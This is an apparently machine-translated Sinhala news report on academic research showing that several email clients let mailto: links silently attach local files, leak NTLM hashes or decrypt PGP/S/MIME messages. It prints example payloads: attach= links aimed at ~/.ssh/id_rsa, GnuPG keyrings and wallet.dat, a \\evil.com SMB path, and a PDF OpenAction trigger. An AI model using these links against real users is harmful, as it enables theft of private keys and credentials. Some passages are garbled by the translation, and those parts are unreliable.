"mailto:" සබැඳි භාවිතයෙන් විද්‍යුත් තැපැල් සේවා දායක පරිශීලකයින්ට පහර දීම

Ruhr විශ්වවිද්‍යාලය Bochum (ජර්මනිය) හි පර්යේෂකයන් විශ්ලේෂණය කළා (PDF) උසස් පරාමිතීන් සහිත "mailto:" සබැඳි සැකසීමේදී තැපැල් සේවාලාභීන්ගේ හැසිරීම. පරීක්‍ෂා කරන ලද විද්‍යුත් තැපැල් සේවාදායකයින් විසි දෙනාගෙන් පහක් “ඇමිණීම” පරාමිතිය භාවිතයෙන් සම්පත් ආදේශනය හසුරුවන ප්‍රහාරයකට ගොදුරු විය. PGP සහ S/MIME යතුරු ප්‍රතිස්ථාපන ප්‍රහාරයකට අමතර විද්‍යුත් තැපැල් සේවාලාභීන් XNUMX දෙනෙකු ගොදුරු විය හැකි අතර, සංකේතාත්මක පණිවිඩවල අන්තර්ගතය උකහා ගැනීමේ ප්‍රහාරයකට සේවාදායකයින් තිදෙනෙකු ගොදුරු විය.

සබැඳි «mailto:"සබැඳියේ දක්වා ඇති ලිපිනයට ලිපියක් ලිවීම සඳහා ඊමේල් සේවාලාභියෙකු විවෘත කිරීම ස්වයංක්‍රීය කිරීමට භාවිතා කරයි. ලිපිනයට අමතරව, ඔබට ලිපියේ විෂය සහ සාමාන්ය අන්තර්ගතය සඳහා අච්චුවක් වැනි සබැඳියේ කොටසක් ලෙස අතිරේක පරාමිතීන් නියම කළ හැකිය. යෝජිත ප්‍රහාරය "ඇමිණුම්" පරාමිතිය හසුරුවයි, එමඟින් ජනනය කරන ලද පණිවිඩයට ඇමුණුමක් ඇමිණීමට ඔබට ඉඩ සලසයි.

තැපැල් සේවාලාභීන් Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL සටහන් (CVE-2020-4089) සහ Pegasus Mail ඔබට ස්වයංක්‍රීයව සුළු ප්‍රහාරයකට ගොදුරු විය හැක. "mailto:?attach=path_to_file" වැනි සබැඳියක් හරහා නිශ්චිතව දක්වා ඇති ඕනෑම දේශීය ගොනුවක්. අනතුරු ඇඟවීමකින් තොරව ගොනුව අමුණා ඇත, එබැවින් විශේෂ අවධානයක් නොමැතිව, පරිශීලකයා ලිපිය ඇමුණුමක් සමඟ යවනු ලබන බව නොදකිනු ඇත.

උදාහරණයක් ලෙස, "mailto: වැනි සබැඳියක් භාවිතා කිරීම:[විද්‍යුත් ආරක්‍ෂිත]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" ඔබට GnuPG වෙතින් පුද්ගලික යතුරු අකුරට ඇතුළු කළ හැක. ඔබට ක්‍රිප්ටෝ පසුම්බිවල (~/.bitcoin/wallet.dat), SSH යතුරු (~/.ssh/id_rsa) සහ පරිශීලකයාට ප්‍රවේශ විය හැකි ඕනෑම ගොනුවල අන්තර්ගතයද යැවිය හැක. තව ද, Thunderbird ඔබට “attach=/tmp/*.txt” වැනි ඉදිකිරීම් භාවිතයෙන් මාස්ක් මගින් ගොනු කණ්ඩායම් ඇමිණීමට ඉඩ සලසයි.

දේශීය ගොනු වලට අමතරව, සමහර විද්‍යුත් තැපැල් සේවාලාභීන් IMAP සේවාදායකයේ ජාල ආචයනය සහ මාර්ග වෙත සබැඳි සකසයි. විශේෂයෙන්ම, IBM Notes මඟින් “attach=\\evil.com\dummyfile” වැනි සබැඳි සකසන විට ජාල නාමාවලියකින් ගොනුවක් මාරු කිරීමට මෙන්ම ප්‍රහාරකයා විසින් පාලනය කරනු ලබන SMB සේවාදායකයකට සබැඳියක් යැවීමෙන් NTLM සත්‍යාපන පරාමිතිවලට බාධා කිරීමට ඉඩ සලසයි. (ඉල්ලීම වත්මන් සත්‍යාපන පරාමිති පරිශීලකයා සමඟ යවනු ලැබේ).

Thunderbird "attach=imap:///fetch>UID>/INBOX>1/" වැනි ඉල්ලීම් සාර්ථකව ක්‍රියාවට නංවයි, එමඟින් ඔබට IMAP සේවාදායකයේ ඇති ෆෝල්ඩරවලින් අන්තර්ගතය ඇමිණීමට ඉඩ සලසයි. ඒ සමගම, OpenPGP සහ S/MIME හරහා සංකේතනය කරන ලද IMAP වෙතින් ලබාගත් පණිවිඩ යැවීමට පෙර තැපැල් සේවාලාභියා විසින් ස්වයංක්‍රීයව විකේතනය කරනු ලැබේ. Thunderbird හි සංවර්ධකයින් විය දැනුම් දුන්නා පෙබරවාරි මාසයේ සහ ගැටලුවේ ගැටලුව ගැන තණ්ඩර්බර්ඩ් 78 ගැටළුව දැනටමත් නිරාකරණය කර ඇත (Thunderbird ශාඛා 52, 60 සහ 68 අවදානමට ලක්ව ඇත).

තණ්ඩර්බර්ඩ් හි පැරණි අනුවාද පර්යේෂකයන් විසින් යෝජනා කරන ලද PGP සහ S/MIME මත වෙනත් ප්‍රහාරක ප්‍රභේද දෙකකට ද අවදානමට ලක් විය. විශේෂයෙන්ම, Thunderbird, මෙන්ම OutLook, PostBox, eM Client, MailMate සහ R2Mail2, ප්‍රධාන ප්‍රතිස්ථාපන ප්‍රහාරයකට ලක් වූ අතර, තැපැල් සේවාලාභියා විසින් S/MIME පණිවිඩ හරහා සම්ප්‍රේෂණය කරන ලද නව සහතික ස්වයංක්‍රීයව ආනයනය කර ස්ථාපනය කිරීම නිසා ඇති විය. පරිශීලකයා විසින් දැනටමත් ගබඩා කර ඇති පොදු යතුරු ආදේශ කිරීම සංවිධානය කිරීමට ප්‍රහාරකයා.

Thunderbird, PostBox සහ MailMate වලට ගොදුරු විය හැකි දෙවන ප්‍රහාරය, කෙටුම්පත් පණිවිඩ ස්වයංක්‍රීයව සුරැකීමේ යාන්ත්‍රණයේ විශේෂාංග හසුරුවන අතර, mailto පරාමිති භාවිතා කරමින්, සංකේතාත්මක පණිවිඩ විකේතනය කිරීම හෝ අත්තනෝමතික පණිවිඩ සඳහා ඩිජිටල් අත්සනක් එකතු කිරීම ආරම්භ කිරීමට ඉඩ සලසයි. ප්‍රතිපල ප්‍රහාරකයාගේ IMAP සේවාදායකය වෙත පසුව සම්ප්‍රේෂණය කිරීම. මෙම ප්‍රහාරයේදී, කේතාංක පෙළ “ශරීරය” පරාමිතිය හරහා සම්ප්‍රේෂණය වන අතර, ප්‍රහාරකයාගේ IMAP සේවාදායකයට ඇමතුමක් ආරම්භ කිරීමට “meta refresh” ටැගය භාවිතා කරයි. උදාහරණ වශයෙන්: ' '

පරිශීලක අන්තර්ක්‍රියාකාරිත්වයකින් තොරව “mailto:” සබැඳි ස්වයංක්‍රීයව සැකසීමට, විශේෂයෙන් නිර්මාණය කර ඇති PDF ලේඛන භාවිතා කළ හැක - PDF හි ඇති OpenAction ක්‍රියාව ඔබට ලේඛනයක් විවෘත කිරීමේදී ස්වයංක්‍රීයව mailto හසුරුවන්නා දියත් කිරීමට ඉඩ සලසයි:

%PDF-1.5
1 obj
<< /Type /Catalog /OpenAction [2 0 R] >>
endobj

2 obj
<< /Type /Action /S /URI/URI (mailto:?body=——BEGIN PGP MESSAGE—[…])>>
endobj

"mailto:" සබැඳි භාවිතයෙන් විද්‍යුත් තැපැල් සේවා දායක පරිශීලකයින්ට පහර දීම

මූලාශ්රය: opennet.ru

අදහස් එක් කරන්න